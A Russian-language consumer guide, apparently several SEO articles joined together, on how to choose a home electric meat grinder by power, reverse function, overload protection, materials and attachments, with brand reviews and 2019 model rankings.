244 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Какую лучше выбрать мясорубку электрическую для дома

Как выбрать электрическую мясорубку: советы экспертов

Вряд ли найдется человек, который не любит есть вкусную пищу, приготовленную дома. К примеру, фарш в супермаркетах не особо отличается высоким качеством, да и на вкус — это далеко не всегда то, чего бы нам хотелось. А вот фарш, приготовленный в домашних условиях, уже совсем другое дело. Давайте посмотрим, как выбрать электрическую мясорубку. Поверьте, сделать это не так просто, как может показаться на первый взгляд.

Немного о мясорубке

Практически каждый из нас пользовался этим устройством. С традиционными механическими мясорубками знакомы все женщины, ведь на кухне без такого инструмента просто не обойтись. Но если ручное устройство имеет недостатки в виде того, что все нужно делать самому, то вот электрический вариант более предпочтителен. Такие мясорубки появились относительно недавно, но с каждым годом набирают все больше популярности. Они хоть и стоят на порядок больше из-за сложной конструкции, но позволяют выполнить измельчение мяса в разы быстрее и проще. Современные устройства позволяют перерабатывать примерно 3 килограмма мяса за минуту, и это независимо от сноровки хозяйки. Кроме того, можно перекрутить курицу, свинину, говядину, индейку и многое другое. Давайте более подробно разберемся, как выбрать электрическую мясорубку. Все они разные и отличаются не только производительностью, но и дизайном, размещением, функциональностью и так далее.

Какие бывают виды мясорубок

Мы уже сказали о том, что электрический привод практически полностью автоматизирует процесс. Это хорошо в любом случае, но иногда это просто необходимо, например, при больших объемах работы, а в некоторых случаях, это нужно просто для удобства. В настоящее время существуют мясорубки, предназначенные для промышленного использования, – напольные. Но нас интересует исключительно бытовая техника, чаще всего она имеет настольное размещение. Лучшим вариантом для дома будет так называемый соло-комбайн. Это настоящая классика. Устройство позволяет делать из мяса фарш, но помимо этого может быть использовано в качестве соковыжималки или же терки для овощей. Для этого необходимы специальные насадки. Иногда они идут в комплекте, а иногда их нужно покупать отдельно. Кухонный комбайн – еще одна разновидность настольных мясорубок. Он сочетает в себе огромное количество функций и может выступать в качестве блендера, миксера, мороженицы и т.п. Такое устройство более предпочтительно тогда, когда вы много и часто готовите, во всех остальных случаях вполне достаточно соло-мясорубки. С этим пунктом мы разобрались, теперь давайте пойдем дальше.

Можно смело сказать, что этот показатель играет далеко не последнюю роль. Если вы хотите узнать, как выбрать электрическую мясорубку, то обратите внимание на мощность агрегата. Вы наверняка понимаете, что для переработки мяса в фарш требуются большие усилия, нежели для перемолки овощей или фруктов. В настоящее время вы имеете возможность купить устройство, мощностью от 200 до 1 600 Ватт. Но нужно делать обдуманную покупку. Если вы купите мясорубку на 200 ватт, то этого будет явно недостаточно. Чтобы все было нормально, вам придется нарезать мясо очень маленькими кубиками и тщательно следить за тем, чтобы не попадались кости. Устройство же на 1 600 Ватт переработает все, даже большие куски с косточками, но вот стоимость таких агрегатов «кусается». Но как выбрать электрическую мясорубку в таком случае, спросите вы? Все очень просто, для бытового использования вполне достаточно устройства мощностью в 500-800 Ватт. Производительность в этом случае будет составлять примерно 3-4 килограмма в минуту.

Надежность – это важно

Как правильно выбрать мясорубку электрическую: лоток и ножи

Что касается приемного лотка для загрузки мяса, то сегодня предлагают металлические и пластиковые изделия. Сразу отметим, что первый вариант более предпочтительный по вполне разумным причинам. Во-первых, металл более долговечный, во-вторых, за ним проще ухаживать, а в-третьих, он не меняет цвет из-за контакта с продуктами и влагой. Идеальные ножи должны быть выполнены из нержавеющей стали. Желательно, чтобы они были самозатачивающиеся. Помимо этого не должно быть дефектов вроде заусениц, задиров и т.п. Все это прямым образом повлияет на долговечность.

Что такое реверс и нужен ли он

Реверс – крайне важная функция, особенно для устройств небольшой мощности. В механической мясорубке тоже есть возможность реверса. Для этого необходимо лишь покрутить ручку в обратном порядке. Что же касается электрических аналогов, то данная функция позволит размотать жилы с винта, и вам не придется разбирать устройство для ручной очистки ножей. Так, как правильно выбрать мясорубку электрическую? Все предельно просто – приемник металлический, ножи острые и качественные, а привод должен быть оснащен реверсом.

Не забываем об эргономике

Если мясорубка будет мощной и надежной, но недостаточно комфортной, то это сведет все преимущества устройства на нет. Размер имеет огромное значение, когда речь идет об электрической мясорубке. Небольшие модели не позволят вам установить высокую посуду под фарш, поэтому имеет смысл обратить внимание на этот момент. Такие производители, как «Бош», «Панасоник» и «Браун», выпускают высокие мясорубки, а вот «Тефаль» и «Кенвуд» — немного ниже. Вес, а также габариты тоже имеют значение. Если вы спрашиваете себя о том, какую выбрать мясорубку электрическую для дома: тяжелую или легкую, то тут вы первым делом должны определиться с местом хранения агрегата. Если вы не собираетесь снимать устройство с рабочего стола, то можно выбрать модель потяжелее, если же планируется частая сборка/разборка и хранение в шкафу, то чем легче мясорубка, тем лучше.

О дополнительных насадках

В настоящее время в комплекте с мясорубкой идет множество различных терок, которые позволяют работать с овощами. Помимо этого практически всегда есть насадки для изготовления полых котлет и даже фигурных заготовок для печенья. Однако тут существует несколько моментов. Во-первых, чем больше насадок, тем больше функциональность и, следовательно, стоимость, а во-вторых, по статистике, большинство покупателей остаются недовольными дополнительными функциями. Поэтому можно смело заявить о том, что электрическая мясорубка нужна для прокручивания фарша, а для овощей лучше купить недорогую овощерезку. Тем не менее, минимальный набор все же будет. При выборе обратите внимание, предусмотрено ли место в мясорубке для хранения насадок, это же касается и шнура. Если его можно спрятать в корпус, то это просто отлично. Таким образом, вам не нужно будет искать разбросанные по шкафам детали, так как все они будут храниться в одном месте.

Электрическая мясорубка: какую выбрать и немного о цене

Зачастую мы ограничены в бюджете на определенную покупку. Но, несмотря на то, что денег у нас не так много, как хотелось бы, всегда нужно покупать качественные и проверенные изделия. Если посмотреть на потребительский рейтинг, то на первом месте стоит мясорубка BOSCH ProPower MFW68660, стоимостью 7,5 тысяч рублей. За эти деньги можно получить высококачественное изделие высокой производительности (4,3 кг/мин). Мощность при блокировке двигателя достигает примерно 2 200 Ватт. Второе место занимает более дешевая модель за 4 200 рублей от «Филипс» HR2768. Данная модель обладает отличной эргономикой и мощностью, поэтому является оптимальным вариантом для бытового использования. Примерно за 5 500 рублей вы сможете приобрести «Редмонд» RMG1203. Отличается от аналогов он не только высокой мощностью, но и исключительно качественными ножами. В принципе, вы уже знаете, как выбрать мясорубку электрическую. Цена является второстепенным фактором. Нежелательно покупать изделия, имеющие стоимость меньше 3 тысяч, да и дороже 8 000 рублей для домашнего пользования приобретать тоже нерационально.

Что говорят покупатели

Не нужно забывать о том, что самое ценное, чем мы может воспользоваться при покупке, — это опыт потребителей, которые ранее уже купили ту или иную модель мясорубки. К примеру, о «Бош» MFW1550 отзываются, как о надежной и исключительно качественной модели. Обусловлено это тем, что корпус стальной, как и внутренние детали. Под фарш можно подставить высокую посуду, а также она не занимает много места. Можно сказать, что о мясорубках немецкой фирмы «Бош» отзываются практически всегда положительно, поэтому, купив агрегат именно этой марки, вы не ошибетесь. Но цена, как правило, тут немалая, но за качество нужно платить. А вот, к примеру, «Браун» G1500 заслужила признание покупателей из-за самозатачивающихся ножей, а также простоты в эксплуатации. Данная модель, по мнению потребителей, является отличным решением для ежедневного использования в быту. При этом вы не будете испытывать никаких проблем с работой агрегата в течение нескольких лет. В принципе, вы уже знаете, как выбрать мясорубку электрическую. Отзывы и советы экспертов – вот на что действительно нужно обращать внимание.

Какому производителю отдать предпочтение

Еще один интересный момент – выбор марки. Выше уже было отмечено высокое качество продукции фирмы «Бош». Но это далеко не одна компания, изготавливающая качественные мясорубки. Большим спросом пользуются устройства от «Филипс». Практически все модели отличаются компактностью и большой функциональностью. Что касается цены, то есть как бюджетные варианты, так и более дорогостоящие. Стоимость колеблется в диапазоне от 4 до 12 тысяч рублей. Производитель «Браун» — тоже достойный кандидат на место среди лидеров. Несмотря на то, что периодически встречается брак среди изделий, многие модели пользуются большим спросом. Это обусловлено проработанной эргономикой и приемлемой ценой. В принципе, есть множество компаний, производящих качественные изделия, поэтому качественной может быть любая электрическая мясорубка, какую выбрать именно вам – это уже совсем другой вопрос.

5 важных правил покупателю

Заключение

Вот мы с вами и поговорили об интересующем нас вопросе. Отдельные несколько предложений хотелось бы сказать о том, как собрать электрическую мясорубку. Как правило, тут нет ничего сложного. Для начала прочитайте инструкцию, там есть полная информация по сборке и разборке. Но если это для вас проблема, то сделайте следующим образом. Шнековый вал вставьте в корпус. Со стороны утолщения на валу крепится ручка. Место соприкосновения корпуса с деталью можно смазать растительным маслом. Дальше оденьте ножи, плоской стороной наружу. После тщательно закрепите решетку и зафиксируйте ручку при помощи специального винта. Вот, в принципе, и все о том, как собрать электрическую мясорубку. Согласитесь, ничего сложного здесь нет. По сути, принцип точно такой же, как и в механическом инструменте. Если вы не знаете, где купить мясорубку электрическую, то это может быть специализированный магазин бытовой техники в вашем городе или же интернет-магазин. Однако в последнем случае вы не сможете осмотреть и пощупать товар руками.

Как выбрать электромясорубку

Как выбрать мясорубку для дома

Решились купить электромясорубку, но не знаете, какую мясорубку выбрать? Для начала разберитесь в самих вариациях и марках. Такая установка бывает традиционная и многофункциональной. Первый вариант рассчитан для перекрутки мяса. Там нет вспомогательных функций. Можно перемолоть за короткий промежуток времени много мяса. Многофункциональная имеет разные насадки, которые могут разрезать мясо, фрукты, овощи, превратить их в сок или мелкую кашицу. Но по мощности первый вариант намного лучше.

Как выбрать мясорубку электрическую для дома? Учитывается целый ряд важных аспектов. Как показала практика, покупатели за основу берут цену мясорубки, но это неправильно. Если ценник не настолько кусается, то возможно и из дешевых подобрать стоящую марку, которая прослужит долгий период.

Существует целый спектр полезных рекомендаций, как выбрать электромясорубку:

  • Выберите определенного товаропроизводителя, потом проведите анализ цен и возможностей нескольких моделей, а уже потом остановите на более подходящем варианте для вас в соответствии с техническими характеристиками.
  • Электромясорубки какие лучше для дома, цена? На стоимость товара влияет реверс и защита от мощного нагревания. Выбирайте прибор, ориентируясь на бюджет.
  • При покупке обращайте внимание на просторный лоток, на котором будет много места для продукта. Чем он больше, тем больше мяса поместится.
  • Берите на вооружение сам товар, гарантия на него должна быть не меньше года. Узнайте, есть ли рядом сервисный центр.

Итак, как выбрать электрическую мясорубку, основные критерии выбора.

Мощность и продуктивность

Оба показателя вплотную связаны между собой — один не может существовать без другого. Все электромясорубки держат обозначенную мощь, которую выявляет рабочий двигатель в нормальном темпе. Большинство моделей имеет много резерва для хорошей работы с хрящиками и прожилками.

Безусловно, продуктивность бок о бок взаимосвязана с мощью. Электроприбор, имеющий 300 Вт, значительно низкий по продуктивности, с 500 Вт — высокий. Сама мера измеряется в килограммах за минуту, а именно — какое количество кило мясного продукта электроприбор перемелет на протяжении одной минуты. Наиболее слабые обрабатывают только 400 граммов за одну минуту. Такие электромясорубки довольно редкие. Допустим, электро мясорубка БЕЛВАР КЭМ-П2У-202-06 мощью в 300 Вт превращает фарш 400 грамм за 1 минуту.

Если мощность мясорубки для домашнего использования составляет 700-1000 Вт, она перерабатывают 4-5 кг мясного продукта за минуту. Допустим, марка Bosch MFW 68660 одна из наиболее продуктивных — мощью 800 Вт она перемолет 4.3 кг за минуту. И именно от мощности зависит цена. Если марка от «БЕЛВАР» стоит 2000–2500 рублей, то Bosch MFW 68660 — 11–12 тысяч рублей.

Реверс

Большая часть покупателей оставляет без внимания такой важный элемент, как реверс. Моторы с ним изменяют направление в обратную сторону, что позволит сэкономить время. Если прожилки намотались на шнейк, то происходит сбой, и он не крутится. Мясорубки без реверса нужно разобрать, снять жилки и потом приступать к работе. С реверсам достаточно установить нужный режим, и шнейк будет крутиться в обратную сторону. А все намотавшиеся прожилки выйдут сами по себе, без посторонней помощи. Их нужно достать и продолжить работу.
Важно — дорогостоящие мясорубки могут идти без реверса, т. к. в нем нет необходимости. Высокая мощь сделает все сама.

Защита от перегруженности

Значительно большая часть мясорубок обладает системой моторной защиты. Для этого используют отдельный предохранитель, который защищает двигательную систему от перегреваний и безмерной перегруженности. Допустим, если в шнеке застревает кость, то мотор не сможет работать на полную мощность. Нарастает перегрузка и двигатель стоит на месте, его заклинило.

Защита может быть разной. Самый что ни на есть известный способ — блокировать работу, используя втулку-предохранитель. При нагреве либо поступлении в середину костей она разрывается. Реже используются размыкатели цепи — пластины, которые находятся в закрытом пространстве при моторном движении. Как только перестает вращаться большое число электронов, они разъединяются. Как итог — цепь разрывается и питание исчезает. После того, как цепь отключают от питания, она встает в первоначальное положение.

В дополнение к защитной системе может быть особый теплоэлемент, который производит замеры температурного режима и выключает двигатель, если возникло превышение меры в установленном режиме.

Время непрерывной работы

Маломощные мясорубки за полцены трудятся на протяжении одной минуты. К примеру, модель Moulinex ME 209 по советам изготовителя работает в беспрерывном режиме только лишь минуту. За данный период двигатель может накалиться, а потом нужно выдержать 10-15 минут, чтобы он остыл. За данный период она отработает 1,7 кг мясного продукта.

Самые продуктивные и сильные системы на ходу до 50 минут, но к ним чаще относятся промышленные модели. Их используют, когда нужно заготовить много фарша.
Их продуктивность 3 кг/мин, в беспрерывном режиме 15 минут, что даст за один оборот переработать 45 кг мяса.

Из какого материала состоит корпус?

Пластик. Короче говоря, это дешевые модели. Пластик, как и металл долговечен, он смотрится стильно. Слабым звеном является неосторожное обращение — его легко можно повредить, поэтому данные устройства требуют бережной эксплуатации.

Металл. Металлические электроприборы дороже, крепкие и удерживают тепло. Когда смыкается цепь, металлический корпус электроприбора не выдаёт неприятный запах, чего нельзя сказать о пластике.

Мытье в посудомоечной машине

Металлический бытовой прибор не рекомендуется для посудомоечных машин — после них пропадает блеск и проявляются следы ржавчины, виднеется налет на металлических деталях. И как итог, к первозданному виду вернуться не под силу. А вот пластиковые модели или приборы из нержавеющей стали смело применяйте в посудомоечной машине, не думая о повреждениях. Исходя выше, берите смело мясорубку, которая не боится посудомоечной машинки.

Насадки

Изготовители к различным маркам рекомендуют банальный или комплексный набор насадок. Благодаря им обычная электро мясорубка, допустим, превращается в соковыжималку.

В продающемся наборе встречаются такие насадки, как:

  • для фарша, для шинкования, для приготовления колбасок, терка;
  • насадка для отжимания соков;
  • диски и формочки для фарша.

Если захотели иметь соковыжималку, то приобретая такую мясорубку для отжатия сока, не нужно рассчитывать на ее эффективность и долговечность. Потому что данный электроприбор, как правило, выполняет функцию перемалывания мяса. Значит, не стоит платить за вспомогательные насадки, толка в этом нет. Вот как правильно выбрать мясорубку электрическую для дома.

Теперь, прочитав данную статью, уже можно правильно выбрать, какую мясорубку лучше купить для вашего дома. Но выбор мясорубки, как раньше, непростой из-за огромного количества спецпредложений на рынке. Внизу приведена субъективная оценка электромясорубок, которые собрали положительные отзывы потребителей.

Итак, как выбрать мясорубку электрическую, рейтинг.
Это и есть обзор мясорубок электрических 2019 года.

1 место — Bosch MFW 45020

Наилучшие рекомендации на рынке, которые приходятся на 2018 год — мясорубка Bosch MFW 45020 ценой 5500 рублей. Данная марка при высоком качестве владеет высококлассной продуктивностью, с легкостью пропускает прожилки, что придаёт результативности перемолу.

Продуктивность — 2,7 кг мясного продукта в минуту. Мощь — 500 Вт. Есть реверс.
Пластиковая мясорубка, но смотрится, как металлическая. Детали разрешено опускать в посудомоечную машину.

  • Собрана без люфтов.
  • Марка представлена целостным корпусом, не издает скрип при использовании.
  • Отсутствуют какие бы то ни были трудности с применением.
  • Само мясо с жилками без усилий приобретает фаршевую форму.
  • Надежность — выполняет основную функцию на протяжении долгого времени.
  • Нет механизма для втягивания шнура, который настолько короткий по размерам, что пользоваться техникой можно рядом с розеткой.
  • Помимо этого, шумная.

Принимая во внимание все минусы, это лучшие мясорубки на рынке, так как имеют достойное совмещение цены и качества, поэтому потребители довольны.

2 место — Kitfort КТ-2101

Далее в списке наилучших домашних приборов — марка от Kitfort.

  • Продуктивность — 1,2 кг/мин.
  • Она имеет систему реверса, защищает от перегруженности.
  • Есть насадки: 2 диска для прорабатывания фарша; для колбас, кебабе.
  • Пластиковая и по низкой цене.
  • Результативность работы — в оптимальной степени без труда управляется с мясными прожилками.
  • Низкое потребление энергии. Красивый дизайн. Компактность. Благодаря ножкам из резины, мясорубка устойчива.
  • Надежность — выполняет основную функцию долгий период времени и без выхода из строя.
  • Значительно недолгое время может работать без перерыва. Не следует работать мясорубке на протяжении 1,5-2 минут без перерыва— издает запах пластмассы, т. к. происходит нагрев корпуса.
  • Сам мясной продукт необходимо порезать на дробные кусочки.
  • Шумит на среднем уровне.
  • Провод не длинный.

Это вместительная электромясорубка, которая при меньшем потреблении энергии получает достаточно продуктивный двигатель. По цене Kitfort КТ-2101 — лучший вариант для 1–2 потребителей.

3 место — Panasonic MK-G1800PWTQ

Данное устройство влетит в копеечку — надежная марка обойдется вам в 14000 рублей. При высоком ценнике она не отличается редкими параметрами, но имеет хорошие рекомендации.

  • Мощь — 330 Вт (максимум — 1,8 кВт).
  • Продуктивность — 1,6 кг мясного продукта в минуту.
  • Есть реверс и двигательная защита.
  • Прилагается 3 диска для фарша.
  • Корпус смешанный — пластик и металл.
  • Ножи на шнеке самостоятельно затачиваются, долговечные.

Такая электромясорубка изготавливается в стране восходящего солнца, в связи с этим основное отличие — высокое качество рабочего процесса. Она представлена обыкновенной сборкой без люфтов, щелей, с качественным мотором, который без труда сладит с любыми мясными жилками.

  • Недопустима мойка в посудомоечной машине и в горячей воде, из-за этого ножи становятся тупыми. Высокий ценник.
  • Слишком массивная, но изготовлена из качественного металла.
  • Тут отсутствуют насадки, которые трансформируют марку в соковыжималку, ножи острые, благодаря которым мясо моментально приобретает форму фарша.

Поэтому это лучший вариант марок из всех представленных.

4 место — Philips HR2723/20

Кухонные приборы Philips прочные и высокотехнологичные, данный прибор не является исключением.

Мощь электродвигателя: 500 Вт (при пике доходит 1,8 кВт).
Продуктивность: 2,3 кг/мин.
Есть реверс и моторная защита от перегруженности.
Корпус состоит из пластика.
Много насадок: терка, для колбас и шинкования, кебабе.
3 диска для фарша.
Позитивные отзывы покупателей.

  • широкая функциональность;
  • тихо работает;
  • огромный ассортимент насадок;
  • продуктивность и мощь — сверхскоростной перемол мясных жилок без труда.

Минусы: затупленность ножей первоначально — их нужно заточить после приобретения.

Защитная система мотора хилая — применяется пластиковый переходник, который соединяет шнек с двигателем. В любом случае придется производить замену при поломке.

Изготовитель гарантирует 2 года на данный прибор, именно это и обеспечивает надежность. Переходник из пластика спустя время сточится. И хотя данный «расходник» предусмотрен на реализационную защиту от перегруженности, даже без них прибор отлично действует при больших объемах работы, поэтому данная марка будет уместна для небольших доз.

5 место — Kenwood MG-700

Чуть ли не супер-профессиональное оборудование, которое сделано в корпусе из металла. Ценник 14–15 тысяч рублей.

Мощь — 800 Вт (максимум — 2 кВт).
Продуктивность — 3 кг мясного продукта за минуту.
Защита от перегруженности, реверс — есть.
Непрерывный режим около 20 минут.
Насадки для колбасок, кебабе, есть фаршевые диски.
Это на редкость мощная и почти бесшумная мясорубка, которая даже при самой высокой продуктивности не особо шумит. Именно её мощность для домашнего использования применима. Она действует с большими объемами, и за один заход обрабатывает приблизительно 60 кг мясного продукта. Марка представлена в прочном корпусе из металла без люфтов, скрипов, есть широкое отверстие для загруженности мясного продукта, которое не требует нарезки на дробные куски. Учитывая рекомендации, электромясорубка без трудностей работает 1.5 года и будет справляться с перемолом мяса еще дольше.

Высокий ценник.
Имеются претензии на фиксированный электромеханизм шнека, он не продуман, а спустя определенный период времени становится шатким в рабочем состоянии.
Большие габариты.
Металлический корпус покрыт лаком, который блестит. Это способствует легкому и мгновенному царапанию. Как итог, внешняя сторона изнашивается.
Отсутствует шнек, который танцует. Шаткий электромеханизм можно встретить одновременно у разных пользователей, однако 90% потребителей выражают свое удовлетворение данным прибором. С точки зрения преобладания минусов и цены данной марке достается 5 место.

Заключение

Теперь вам известно, какая электромясорубка создана для вас и станет лучшей помощницей на кухне. В заключении дадим рекомендации, от каких марок следует отказаться. От тех, у которых:

  • Люфты и скрипы. Изучая данную кухонную утварь сконцентрируйтесь на том, как она собрана.
  • Прогибается корпус, части трясутся в середине.
  • Бренд. Известные бренды типа Bosch, Panasonic и остальные думают о статусе и допускают обычный качественный контроль . Выбирая электроприбор «ноунэйм» бренда, подготовьтесь к тому, что он может быстро сломаться.
  • Функциональность — не гонитесь за обилием насадок либо функциональностью. Для такого есть комбайны. Для того, чтобы перемолоть мясной продукт, вполне хватит и одной насадки — диска. Следовательно, если цены одинаковые, то лучше остановиться на надежной и высококачественной марке с минимальным количеством насадок.

Исходя из вышенаписанного, вы узнали, какую мясорубку лучше купить для дома. сконцентрируйтесь на главных мерках и прочитайте отзывы о товаре, который вам понравился. Ведь именно так вы сможете остановить свой выбор на лучшей марке, которая долгий период будет качественно выполнять свою важную функцию без повреждений и любых трудностей.

Как правильно выбрать электрическую мясорубку для дома? Популярные производители

При выборе электромясорубки для домашнего использования, стоит учитывать сразу несколько параметров и характеристик. Их наличие и сочетание в определенных моделях может меняться, в зависимости от вариантов использования и предполагаемых нагрузок. В данном случае, стоимость прибора не всегда оправдывает его востребованность и удобство использования.

Выбор электрической мясорубки исключительно по цене – в корне неверный подход.

Даже за небольшие деньги можно подобрать прибор, отвечающий всем требованиям и запросам покупателя.

В статье рассказано о том, на что необходимо обратить внимание при покупке, какие варианты электромясорубок представлены на рынке и какую лучше выбрать.

В конце статьи представлен список наиболее популярных производителей и моделей.

Навигация по странице:

Что такое электромясорубка?

Электрическая мясорубка состоит из следующих деталей:

  • корпус;
  • нож для измельчения;
  • решетка и фиксирующий диск;
  • шнековый вал;
  • приемник для продуктов и толкатель;
  • дополнительные элементы и насадки, в зависимости от модели.

Продукт, помещенный в приемник, попадает на шнек и продвигается к ножам.

Здесь он вплотную прижимается к решетке и измельчается ножом до размера, который позволяет протолкнуть продукт сквозь отверстия.

Весь процесс измельчения занимает около 5-10 секунд.

Назначение устройства

Электромясорубка, в зависимости от комплектации, может выполнить следующие задачи:

  • измельчить все виды фарша: из мяса, рыбы или птицы;
  • нашинковать овощи;
  • отжать сок из мягких овощей и фруктов;
  • набить фаршем оболочку колбас и сосисок;
  • приготовить лапшу или спагетти;
  • сформировать печенье из песочного теста.

Некоторые модели комплектуются насадкой для измельчения орехов.

Как выбрать: параметры и характеристики

Для того, чтобы разобраться, как правильно выбрать подходящую модель электромясорубки для дома стоит обратить внимание не только на ее стоимость, но и на ряд других важных характеристик.

Мощность и производительность

Чем выше показатель мощности, тем легче прибор справляется с жилами и жесткими кусками мяса.

Мощность, представленных на рынке моделей, колеблется в диапазоне от 400 до 2200 Вт.

Все приборы, с более высокими показателями, относятся к промышленным, использование которых в домашних условиях неоправданно.

Мощные электромясорубки с легкостью справятся с любым мясом или другим продуктом.

Однако, их уровень шума и энергопотребления значительно выше приборов с низкой мощностью.

Этот показатель тесно связан с мощностью: чем она выше, тем больше производительность, и наоборот.

Диапазон показателей производительности варьируется от 0,5 до 2,5 кг в минуту.

В случае, если в описании модели мясорубки указана, при одинаковой мощности, разная производительность, то стоит отдать предпочтение прибору с большей производительностью.

Такая электромясорубка лучше справится с жестким мясом и будет меньше изнашиваться при нагрузках.

Реверс

Наличие реверса означает, что мотор прибора может вращаться в обратном направлении.

Эта функция значительно облегчит освобождение ножа и шнека от намотавшихся на них жил.

После запуска реверса, шнек начинает вращаться в обратную сторону и все жилы выходят из загрузочного отверстия, где их легко удалить.

Модели без реверса придется бы разбирать и чистить вручную.

Защита от перегрузки

В качестве защиты выступает специальный предохранитель, прекращающий работу прибора в случае возникновения перегрева или чрезмерных нагрузок.

Например, при попадании и застревании в шнеке кости или же нагреве двигателя при длительном времени беспрерывной работы.

Существует несколько вариантов реализации функции защиты:

  • блокировка с использованием втулки-предохранителя.
    При перегреве или увеличении нагрузки, она лопается и останавливает работу.
    Этот метод применяется в большинстве моделей;
  • пластины, которые находятся в замкнутом состоянии при работе мотора.
    Если двигатель останавливается, то на пластины воздействует поток электронов, они размыкаются и питание пропадает.
    После отключения от сети, цепь возвращается в исходное положение и не препятствует работе.
    Этот вариант защиты встречается в приборах гораздо реже;
  • термоэлемент.
    Эта составляющая присутствует только в отдельных моделях и является дополнением.
    Термоэлемент измеряют температуру мотора и отключает его при перегреве.
    Так как у электромясорубки есть и другая защита, наличие термоэлемента не является ключевым параметром.

Время непрерывной работы

Этот параметр важен, если на электромясорубку предполагаются серьезные и регулярные нагрузки.

Продолжительность работы напрямую зависит от типа обрабатываемого продукта.

При измельчении мясного фарша, время непрерывной работы не может превышать 15 минут.

Материал корпуса

  • пластик.
    егкий, долговечный материал с большим количеством оттенков, за которым легко ухаживать.
    Единственный минус – хрупкость. Пластик легко расколоть или повредить при случайном ударе;
  • металл.
    Модели с таким корпусом, дороже, прочнее и выдерживают большие температуры нагрева.
    Последний критерий важен при коротком замыкании – металлический корпус не загорится и не будет пахнуть, в отличие от пластикового.
    Металл имеет всего несколько оттенков исполнения, однако, это не ухудшает внешний вид мясорубки.

Выбор стоит осуществлять исключительно из вкусовых предпочтений или других характеристик.

Существенной разницы между корпусом из металла или качественного пластика нет.

Мытье в посудомойке

Мыть в посудомоечной машине можно лишь отдельные, редко встречающиеся модели.

Для посудомойки пригодны лишь детали из пластика или нержавейки.

Если есть необходимость в облегчении процесса ухода и очищения, то стоит поискать именно такие модели электромясорубок.

Насадки

Комплектация и набор насадок могут различаться, в зависимости от модели. Существуют следующие виды насадок:

  • мясорубка – основная насадка, без которой не обходится ни одна модель.
    Предназначена для изготовления фарша, может иметь в комплекте несколько видов решеток с различным диаметром отверстий.
    Чем они больше, тем крупнее будет порублен фарш;
  • шинковка – необходима для измельчения овощей и фруктов.
    В зависимости от типа ножей в шинковке, продукты могут быть нарезаны дольками, кружками или натерты на терке;
  • соковыжималка – предназначена для отжима сока из мягких фруктов и овощей.
    В отдельную емкость сливается сок, а в другую – отработанный жмых;
  • для кеббе – служит для изготовления кеббе (мясного блюда, напоминающего зразу);
  • насадка для колбасы и сосисок – с ее помощью удобно набивать оболочку этих изделий мясным фаршем;
  • для печенья – предназначена для формирования песочного печенья.

Количество скоростей

Распространенный вариант – наличие двух скоростей. Но встречаются модели и всего с одной кнопкой включения, без возможности выбора скорости.

Выбор стоит осуществлять, ориентируясь на предполагаемые варианты использования мясорубки.

Если помимо фарша, предполагается использовать мясорубку для отжима сока, формирования печенья или лапши, то без второй скорости не обойтись.

Так проще контролировать процесс и возможно снизить уровень шума и энергопотребления.

Измельчить все виды фарша можно на приборе, имеющем только одну скорость.

Популярные производители

Bosch
Мясорубки этого производителя обладают высоким качеством и справляются даже с прожилками и жесткими продуктами. Популярные модели:

Moulinex.
На рынке представлены несколько моделей этого производителя.
Все они отличаются высокой производительностью и стильным дизайном.
Пользуются популярностью у покупателей:

Kitfort.
Модели этого производителя получили свое распространение из-за высокого качества и относительно низкой стоимости. Среди них:

Philips.
Надежный и зарекомендовавший себя производитель бытовой техники, представляющий на рынке несколько моделей электромясорубок:

      • HR2709 Daily Collection;
      • HR2723/20 Viva Collection;
      • HR2710/10 Daily Collection.

Аксион.
Отечественный производитель, приборы которого комплектуются максимальным количеством насадок. Популярные модели Аксиона:

Отзывы

Если вы пользовались товарами, про которые шла речь в статье, оставьте, пожалуйста, отзыв в форме, которая находится ниже.

Ваш отзыв поможет кому-то сделать выбор. Спасибо, что делитесь опытом!

10 лучших электромясорубок для дома 2019

Мясорубка – один из самых популярных и незаменимых бытовых приборов, особенно в России, население которой обожает котлеты, тефтели и различные производные пельменей. Сегодня мы расскажем, как выбрать лучшую электромясорубку для дома и какую модель купить в 2019 году.

Как выбрать электрическую мясорубку?

Ценовой диапазон

Как правило, чем дороже изделие, тем на большие объемы оно рассчитано. Недорогая бытовая мясорубка стоит около 3-5 тысяч рублей и подразумевает переработку мяса до 3-4 порций за сессию.

Товар подороже, до 12 тысяч рублей, уже способен приготовить большее число порций, а также оснащен всякими дополнительными штучками, включая и насадки для овощей. Такая мясорубка сможет не только быстро провернуть фарш, но и натереть морковь в салат, а настрогать картошку для запекания и выжать апельсинов на стакан сока по утрам.

Мясорубки выше 15-20 тысяч рублей предназначены для полупромышенного применения или идейных мясоедов. Они, как правило, полностью металлические и способны переработать астрономическое количество фарша. Но надо ли оно вам?

Мощность

Чем больше ватт на упаковке, тем мощнее мясорубка, тем большие объемы она сможет переработать за меньший промежуток времени, тем более сложное мясо она сможет «взять». Например, если мощность мясорубки до 800 Вт, то перед использованием из мяса придется вручную убрать все сухожилия и хрящи. А если мощность от 1400 Вт, то такая мясорубка с легкостью справится с 2-3 кг мяса за минуту, а хрящи вы даже не заметите.

Обратите внимание, что производители имеют обыкновение ставить в техпаспортах максимальную возможную мощность; номинальная мощность гораздо ниже. Например, максимальная стоит 1700 Вт, а на деле рабочий режим мясорубки – от силы 600 Вт.

Размеры

Еще один важный критерий – размер самой мясорубки. Если у вас маленькая кухня, стоит заранее подумать, где именно и как будет размещаться ваша новая помощница, и где вы будете хранить аксессуары к ней.

Чем больше металла, тем лучше

Не секрет, что пластик уступает в долговечности нержавеющей стали. Поэтому чем больше металлических частей будет в вашей мясорубке, тем лучше.

Впрочем, для домашнего использования вполне достаточно, чтобы у мясорубки основная, рабочая часть (особенно шнек для мяса) была полностью из металла, а вот наружный корпус вполне может быть пластиковым. И, разумеется, насадки должны быть только металлическими.

Дополнительные аксессуары

Помимо ножей для мяса и решеток, у многих современных мясорубок есть насадки для приготовления колбас, насадка-кеббе для поклонников восточной кухни и даже комплект для собственноручного изготовления макаронных изделий. Не считая еще набора терок и измельчителей для овощей.

Рейтинг электромясорубок для дома 2019

Предлагаем вашему вниманию список из 10 самых популярных моделей электрических мясорубок, составленный на основе отзывов и рейтингов пользователей на сайте Яндекс.Маркет.

10. Аксион М 41.02

Средняя цена: 5 100 руб.
Характеристики:

  • мощность 1700 Вт
  • перерабатывает 2 кг/мин
  • насадка-терка, насадка для приготовления колбас, насадка для шинковки, насадка для кеббе, диск для фарша
  • корпус из пластика
  • цитрус-пресс и шнековая соковыжималка

